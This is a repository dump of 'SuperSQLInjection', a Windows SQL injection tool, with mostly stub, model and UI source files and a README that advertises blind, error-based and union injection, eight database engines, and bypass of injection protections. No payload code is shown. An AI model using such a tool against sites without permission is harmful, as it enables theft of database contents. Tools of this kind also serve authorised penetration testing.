├── 视频教程地址.txt
├── SuperSQLInjection
├── favicon.ico
├── Resources
│ ├── bg.png
│ └── article_top_nav_bg.png
├── Properties
│ ├── images
│ │ ├── bg.png
│ │ ├── btn.png
│ │ ├── bug.png
│ │ ├── se.png
│ │ ├── set.png
│ │ ├── 下载.png
│ │ ├── 保存.png
│ │ ├── 关于.png
│ │ ├── 声明.png
│ │ ├── 导入.png
│ │ ├── 导出.png
│ │ ├── 手册.png
│ │ ├── 更新.png
│ │ ├── 版本.png
│ │ ├── HTTP.png
│ │ ├── Ilog.png
│ │ ├── help.png
│ │ ├── lang.png
│ │ ├── line.png
│ │ ├── m_bg.png
│ │ ├── menu.png
│ │ ├── stop.png
│ │ ├── tool.png
│ │ ├── vers.png
│ │ ├── bypass.png
│ │ ├── config.png
│ │ ├── dbinfo.png
│ │ ├── favicon.ico
│ │ ├── getvers.png
│ │ └── stop_red.png
│ ├── Settings.settings
│ ├── Settings.Designer.cs
│ ├── AssemblyInfo.cs
│ └── app.manifest
├── app.config
├── payload
│ ├── DBPayload.cs
│ ├── Access.cs
│ ├── Comm.cs
│ ├── SQLite.cs
│ ├── DB2.cs
│ └── Informix.cs
├── tools
│ ├── http
│ │ ├── model
│ │ │ ├── HttpResponse.cs
│ │ │ └── HttpRequest.cs
│ │ ├── HttpProxy.cs
│ │ ├── HttpTools.cs
│ │ ├── TimeOutSocket.cs
│ │ ├── HTTPRequest.cs
│ │ └── SocketProxy.cs
│ ├── smartthread
│ │ ├── SLExt.cs
│ │ ├── CanceledWorkItemsGroup.cs
│ │ ├── InternalInterfaces.cs
│ │ ├── SmartThreadPool.ThreadEntry.cs
│ │ ├── STPEventWaitHandle.cs
│ │ ├── SynchronizedDictionary.cs
│ │ ├── WorkItemInfo.cs
│ │ ├── Stopwatch.cs
│ │ ├── EventWaitHandleFactory.cs
│ │ ├── EventWaitHandle.cs
│ │ ├── Exceptions.cs
│ │ ├── WorkItemResultTWrapper.cs
│ │ ├── CallerThreadContext.cs
│ │ ├── WIGStartInfo.cs
│ │ ├── PriorityQueue.cs
│ │ └── WorkItem.WorkItemResult.cs
│ ├── StringLengthComparer.cs
│ ├── encode
│ │ ├── URLTools.cs
│ │ └── URLEncode.cs
│ ├── MyCopare.cs
│ ├── StringTools.cs
│ ├── LikeMath.cs
│ ├── ListViewColumnSorter.cs
│ ├── OnlineMD5.cs
│ └── XML.cs
├── model
│ ├── InjectType.cs
│ ├── LogLevel.cs
│ ├── KeyType.cs
│ ├── URL.cs
│ ├── DBType.cs
│ ├── SelectNode.cs
│ ├── DataBase.cs
│ ├── ErrorMessage.cs
│ ├── GetDataPam.cs
│ ├── Injection.cs
│ ├── InjectLog.cs
│ ├── Proxy.cs
│ ├── ServerInfo.cs
│ ├── SerializableDictionary.cs
│ └── Config.cs
├── About.cs
├── Waring.cs
├── Program.cs
├── ShowResponse.cs
├── AddNode.cs
├── FindString.cs
├── Waring.Designer.cs
├── About.Designer.cs
├── AddNode.Designer.cs
├── FindString.Designer.cs
├── Seting.cs
├── AddNode.resx
├── Seting.resx
├── Waring.resx
├── FindString.resx
├── ShowResponse.resx
├── about.resx
└── scan
│ └── Spider.cs
├── 超级SQL注入工具使用说明书V1.1 20190303.docx
├── README.md
├── SuperSQLInjection.sln
├── .gitattributes
└── .gitignore
/视频教程地址.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/视频教程地址.txt
--------------------------------------------------------------------------------
/SuperSQLInjection/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/favicon.ico
--------------------------------------------------------------------------------
/超级SQL注入工具使用说明书V1.1 20190303.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/超级SQL注入工具使用说明书V1.1 20190303.docx
--------------------------------------------------------------------------------
/SuperSQLInjection/Resources/bg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Resources/bg.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/bg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/bg.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/btn.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/btn.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/bug.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/bug.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/se.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/se.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/set.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/set.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/下载.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/下载.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/保存.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/保存.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/关于.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/关于.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/声明.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/声明.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/导入.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/导入.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/导出.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/导出.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/手册.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/手册.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/更新.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/更新.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/版本.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/版本.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/HTTP.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/HTTP.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/Ilog.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/Ilog.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/help.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/help.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/lang.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/lang.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/line.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/line.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/m_bg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/m_bg.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/menu.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/menu.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/stop.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/stop.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/tool.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/tool.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/vers.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/vers.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/bypass.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/bypass.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/config.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/config.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/dbinfo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/dbinfo.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/favicon.ico
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/getvers.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/getvers.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/images/stop_red.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Properties/images/stop_red.png
--------------------------------------------------------------------------------
/SuperSQLInjection/Resources/article_top_nav_bg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shack2/SuperSQLInjectionV1/HEAD/SuperSQLInjection/Resources/article_top_nav_bg.png
--------------------------------------------------------------------------------
/SuperSQLInjection/app.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/SuperSQLInjection/payload/DBPayload.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace SuperSQLInjection.payload
7 | {
8 | class DBPayload
9 | {
10 |
11 | }
12 | }
13 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/http/model/HttpResponse.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace SuperSQLInjection.tools.http.model
7 | {
8 | class HttpResponse
9 | {
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/http/model/HttpRequest.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace SuperSQLInjection.tools.http.model
7 | {
8 | class HttpRequest
9 | {
10 |
11 | }
12 | }
13 |
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/Settings.settings:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/smartthread/SLExt.cs:
--------------------------------------------------------------------------------
1 | #if _SILVERLIGHT
2 |
3 | using System.Threading;
4 |
5 | namespace Amib.Threading
6 | {
7 | public enum ThreadPriority
8 | {
9 | Lowest,
10 | BelowNormal,
11 | Normal,
12 | AboveNormal,
13 | Highest,
14 | }
15 | }
16 | #endif
17 |
--------------------------------------------------------------------------------
/SuperSQLInjection/model/InjectType.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | namespace SuperSQLInjection.model
6 | {
7 | [Serializable]
8 | public enum InjectType
9 | {
10 | UnKnow = 0,
11 | Blind= 1,
12 | Error=2,
13 | Union = 3
14 | }
15 | }
16 |
--------------------------------------------------------------------------------
/SuperSQLInjection/model/LogLevel.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace SuperSQLInjection.model
7 | {
8 | public enum LogLevel
9 | {
10 | error = -1,
11 | info = 0,
12 | waring = 1,
13 | success = 2,
14 |
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/SuperSQLInjection/model/KeyType.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | namespace SuperSQLInjection.model
6 | {
7 | [Serializable]
8 | public enum KeyType
9 | {
10 | Key=0,
11 | Reg = 1,
12 | Code =2,
13 | Time = 3,
14 | EQLen = 4,
15 | MaxLen =5,
16 | MinLen =6
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/SuperSQLInjection/model/URL.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | namespace SuperSQLInjection.model
6 | {
7 | class URL
8 | {
9 | public String url;
10 | public int level;
11 | public URL(String url, int level) {
12 |
13 | this.url = url;
14 | this.level = level;
15 |
16 | }
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/SuperSQLInjection/About.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Data;
5 | using System.Drawing;
6 | using System.Text;
7 | using System.Windows.Forms;
8 |
9 | namespace SuperSQLInjection
10 | {
11 | public partial class About : Form
12 | {
13 | public About()
14 | {
15 | InitializeComponent();
16 | }
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/SuperSQLInjection/Waring.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Data;
5 | using System.Drawing;
6 | using System.Text;
7 | using System.Windows.Forms;
8 |
9 | namespace SuperSQLInjection
10 | {
11 | public partial class Waring : Form
12 | {
13 | public Waring()
14 | {
15 | InitializeComponent();
16 | }
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/SuperSQLInjection/model/DBType.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | namespace SuperSQLInjection.model
6 | {
7 | [Serializable]
8 | public enum DBType
9 | {
10 | UnKnow=0,
11 | Access=1,
12 | MySQL = 2,
13 | SQLServer = 3,
14 | Oracle = 4,
15 | PostgreSQL=5,
16 | DB2 = 6,
17 | SQLite=7,
18 | Informix=8
19 | }
20 | }
21 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/smartthread/CanceledWorkItemsGroup.cs:
--------------------------------------------------------------------------------
1 | namespace Amib.Threading.Internal
2 | {
3 | internal class CanceledWorkItemsGroup
4 | {
5 | public readonly static CanceledWorkItemsGroup NotCanceledWorkItemsGroup = new CanceledWorkItemsGroup();
6 |
7 | public CanceledWorkItemsGroup()
8 | {
9 | IsCanceled = false;
10 | }
11 |
12 | public bool IsCanceled { get; set; }
13 | }
14 | }
--------------------------------------------------------------------------------
/SuperSQLInjection/model/SelectNode.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 | using System.Windows.Forms;
5 |
6 | namespace SuperSQLInjection.model
7 | {
8 | public class SelectNode
9 | {
10 | public TreeNode tn = new TreeNode();
11 | public int limit = 0;
12 | public String dbname = "";
13 | public String tableName = "";
14 | public String columnName = "";
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/SuperSQLInjection/model/DataBase.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections;
3 | using System.Collections.Generic;
4 | using System.Linq;
5 | using System.Text;
6 |
7 | namespace SuperSQLInjection.model
8 | {
9 | [Serializable]
10 | public class DataBase
11 | {
12 | public SerializableDictionary>> tables=new SerializableDictionary>>();
13 | }
14 | }
15 |
--------------------------------------------------------------------------------
/SuperSQLInjection/model/ErrorMessage.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | namespace SuperSQLInjection.model
6 | {
7 | public static class ErrorMessage
8 | {
9 | public static String mysql4_no_error_inject_info = "抱歉MySQL4数据库,不支持错误显示注入!";
10 | public static String access_no_error_inject_info = "抱歉Access数据库,不支持错误显示注入!";
11 | public static String access_no_key = "Access数据库需要关键字协助盲猜表明,所以大侠请你填写好关键字!";
12 | }
13 | }
14 |
--------------------------------------------------------------------------------
/SuperSQLInjection/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Windows.Forms;
4 |
5 | namespace SuperSQLInjection
6 | {
7 | static class Program
8 | {
9 | ///
10 | /// 应用程序的主入口点。
11 | ///
12 | [STAThread]
13 | static void Main()
14 | {
15 | Application.EnableVisualStyles();
16 | Application.SetCompatibleTextRenderingDefault(false);
17 | Application.Run(new Main());
18 | }
19 | }
20 | }
21 |
--------------------------------------------------------------------------------
/SuperSQLInjection/model/GetDataPam.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 | using System.Windows.Forms;
5 |
6 | namespace SuperSQLInjection.model
7 | {
8 | class GetDataPam
9 | {
10 |
11 | public List columns = null;
12 | public int limit = 0;
13 | public String dbname = "";
14 | public String table = "";
15 | public Boolean isMuStr = false;//开启多字节
16 | public ListViewItem lvi = null;
17 | public int data_count =0;
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/SuperSQLInjection/model/Injection.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | namespace SuperSQLInjection.model
6 | {
7 | public class Injection
8 | {
9 | public String url="";
10 | public int index = 0;
11 | public bool isInjection =false;
12 | public String injectType = "";
13 | public String payload="";
14 | public String paramName = "";
15 | public String dbType = "";
16 | public String remark = "";
17 | public String testUrl = "";
18 |
19 | }
20 | }
21 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/StringLengthComparer.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace tools
7 | {
8 | class StringLengthComparer : System.Collections.IComparer
9 | {
10 | public int Compare(object x, object y)
11 | {
12 | string s1 = (string)x;
13 |
14 | string s2 = (string)y;
15 |
16 | if (s1.Length > s2.Length) return -1;
17 |
18 | if (s1.Length < s2.Length) return 1;
19 | return 0;
20 |
21 | }
22 |
23 | }
24 | }
25 |
--------------------------------------------------------------------------------
/SuperSQLInjection/model/InjectLog.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace SuperSQLInjection.model
7 | {
8 | class InjectLog
9 | {
10 | public int id=0;
11 | public String ip= "";
12 | public int port = 0;
13 | public String url = "";
14 | public InjectType injectType = new InjectType();
15 | public DBType dbType = new DBType();
16 | public String usePayload = "";
17 | public String testPayload = "";
18 | public String request = "";
19 |
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | 超级SQL注入工具
2 | 简介:
3 | 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,采用C#开发,程序采用自写代码来操作HTTP交互,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入;支持以盲注、错误显示、Union注入等方式来获取数据;支持Access/MySQL/SQLServer/Oracle/PostgreSQL/DB2/SQLite/Informix等数据库;支持手动灵活的进行SQL注入绕过,可自定义进行字符替换等绕过注入防护。本工具为渗透测试人员、信息安全工程师等掌握SQL注入技能的人员设计,需要使用人员对SQL注入有一定了解。
4 | 工具特点:
5 | 1.支持任意地点出现的任意SQL注入。
6 | 2.支持全自动识别注入标记,也可人工识别注入并标记。
7 | 3.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。
8 | 4.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。
9 | 5.依靠关键字/时间等进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。
10 | 6.程序采用自编码操作HTTP请求,HTTP发包和获取速度较快。
11 |
12 |
13 | SQL注入测试地址:http://test.shack2.org
14 |
--------------------------------------------------------------------------------
/SuperSQLInjection/model/Proxy.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 | using System.Collections;
5 |
6 | namespace SuperSQLInjection.model
7 | {
8 | [Serializable]
9 | public class Proxy
10 | {
11 | public Proxy() {
12 |
13 | }
14 | public String host = "";
15 | public int port = 0;
16 | public String proxyType = "HTTP";//socks5,或HTTP
17 | public String username = "";//代理账户
18 | public String password = "";//代理密码
19 | public String isOk ="未验证";//未验证,是,否
20 | public int useTime = 0;//连接使用时间
21 | public String checkTime = "";//验证时间
22 | }
23 | }
24 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/encode/URLTools.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 | using model;
5 |
6 | namespace SuperSQLInjection.tools
7 | {
8 | class URLTools
9 | {
10 | public static ServerInfo getHostAndPathQueryByURL(String url){
11 |
12 | try
13 | {
14 | ServerInfo server = new ServerInfo();
15 | Uri uri = new Uri(url);
16 | server.host = uri.Host;
17 | server.url = uri.PathAndQuery;
18 | server.port = uri.Port;
19 | return server;
20 | }
21 | catch (Exception e) {
22 |
23 | throw e;
24 | }
25 | }
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/MyCopare.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace SuperSQLInjection.tools
7 | {
8 | class MyCopare : System.Collections.IComparer
9 | {
10 | public int Compare(object x, object y)
11 | {
12 | string s1 = (string)x;
13 |
14 | string s2 = (string)y;
15 |
16 | if (s1.Length > s2.Length) return 1;
17 |
18 | if (s1.Length < s2.Length) return -1;
19 |
20 | for (int i = 0; i < s1.Length; i++)
21 | {
22 |
23 | if (s1[i] > s2[i]) return 1;
24 |
25 | if (s1[i] < s2[i]) return -1;
26 |
27 | }
28 |
29 | return 0;
30 |
31 | }
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/smartthread/InternalInterfaces.cs:
--------------------------------------------------------------------------------
1 |
2 | namespace Amib.Threading.Internal
3 | {
4 | ///
5 | /// An internal delegate to call when the WorkItem starts or completes
6 | ///
7 | internal delegate void WorkItemStateCallback(WorkItem workItem);
8 |
9 | internal interface IInternalWorkItemResult
10 | {
11 | event WorkItemStateCallback OnWorkItemStarted;
12 | event WorkItemStateCallback OnWorkItemCompleted;
13 | }
14 |
15 | internal interface IInternalWaitableResult
16 | {
17 | ///
18 | /// This method is intent for internal use.
19 | ///
20 | IWorkItemResult GetWorkItemResult();
21 | }
22 |
23 | public interface IHasWorkItemPriority
24 | {
25 | WorkItemPriority WorkItemPriority { get; }
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/StringTools.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Text.RegularExpressions;
6 |
7 | namespace SuperSQLInjection.tools
8 | {
9 | class StringTools
10 | {
11 |
12 | public static bool CheckIsIP(String ipStr) {
13 | return Regex.IsMatch(ipStr, @"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}");
14 | }
15 |
16 | public static bool CheckIsDomain(String ipStr)
17 | {
18 | return Regex.IsMatch(ipStr, "[\\w\\-\\.]{1,100}[a-zA-Z]{1,8}");
19 | }
20 |
21 | public static bool IsNumber(String ipStr)
22 | {
23 | return Regex.IsMatch(ipStr, @"[\d]{1,5}");
24 | }
25 |
26 | public static bool CheckIsDomainOrIP(String str)
27 | {
28 | return (CheckIsDomain(str)|| CheckIsIP(str));
29 | }
30 | }
31 | }
32 |
--------------------------------------------------------------------------------
/SuperSQLInjection/model/ServerInfo.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Net;
4 | using System.Text;
5 |
6 | namespace model
7 | {
8 | public class ServerInfo
9 | {
10 | public String host = "";//host主机头
11 | public String url = "";//pathAndQuery
12 | public String method = "";//请求方法
13 | public int port = 80;
14 | public String request = "";
15 | public String encoding = "";
16 | public String header = "";
17 | public String body = "";
18 | public String reuqestBody = "";
19 | public String reuqestHeader = "";
20 | public Dictionary headers = new Dictionary();
21 | public String response = "";
22 | public String gzip = "";
23 | public int length = 0;
24 | public int code = 0;
25 | public int location = 0;
26 | public long runTime = 0;//获取网页消耗时间,毫秒
27 | public int sleepTime = 0;//休息时间
28 | public String cookies = "";
29 | public Boolean timeout = false;
30 | }
31 | }
32 |
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/Settings.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // 此代码由工具生成。
4 | // 运行时版本:4.0.30319.42000
5 | //
6 | // 对此文件的更改可能会导致不正确的行为,并且如果
7 | // 重新生成代码,这些更改将会丢失。
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace SuperSQLInjection.Properties {
12 |
13 |
14 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
15 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "14.0.0.0")]
16 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase {
17 |
18 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
19 |
20 | public static Settings Default {
21 | get {
22 | return defaultInstance;
23 | }
24 | }
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // 有关程序集的常规信息通过以下
6 | // 特性集控制。更改这些特性值可修改
7 | // 与程序集关联的信息。
8 | [assembly: AssemblyTitle("超级SQL注入工具")]
9 | [assembly: AssemblyDescription("design by shack2")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("www.shack2.org")]
12 | [assembly: AssemblyProduct("超级SQL注入工具")]
13 | [assembly: AssemblyCopyright("Copyright © 2014-2020")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // 将 ComVisible 设置为 false 使此程序集中的类型
18 | // 对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型,
19 | // 则将该类型上的 ComVisible 特性设置为 true。
20 | [assembly: ComVisible(false)]
21 |
22 | // 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID
23 | [assembly: Guid("d5688068-fc89-467d-913f-037a785caca7")]
24 |
25 | // 程序集的版本信息由下面四个值组成:
26 | //
27 | // 主版本
28 | // 次版本
29 | // 内部版本号
30 | // 修订号
31 | //
32 | // 可以指定所有这些值,也可以使用“内部版本号”和“修订号”的默认值,
33 | // 方法是按如下所示使用“*”:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.2020.02.09")]
36 | [assembly: AssemblyFileVersion("1.2020.02.09")]
37 |
--------------------------------------------------------------------------------
/SuperSQLInjection/ShowResponse.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Data;
5 | using System.Drawing;
6 | using System.Text;
7 | using System.Windows.Forms;
8 | using model;
9 |
10 | namespace SuperSQLInjection
11 | {
12 | public partial class ShowResponse : Form
13 | {
14 | public ShowResponse()
15 | {
16 | InitializeComponent();
17 | }
18 |
19 | public ServerInfo server = new ServerInfo();
20 |
21 | private void ShowResponse_Shown(object sender, EventArgs e)
22 | {
23 | this.txt_requestHeader.Text = this.server.reuqestHeader;
24 | this.txt_requestBody.Text = this.server.reuqestBody;
25 | this.txt_responseHeader.Text = this.server.header;
26 | this.txt_responseBody.Text = this.server.body;
27 |
28 | this.webBrowser1.ScriptErrorsSuppressed = true;
29 | this.webBrowser1.DocumentText = this.server.body;
30 | }
31 |
32 | private void txt_responseBody_KeyDown(object sender, KeyEventArgs e)
33 | {
34 | if (e.Modifiers == Keys.Control && e.KeyCode == Keys.F)
35 | {
36 | FindString fs = new FindString();
37 | fs.txtbox = this.txt_responseBody;
38 | fs.Show();
39 | }
40 | }
41 |
42 | }
43 | }
44 |
--------------------------------------------------------------------------------
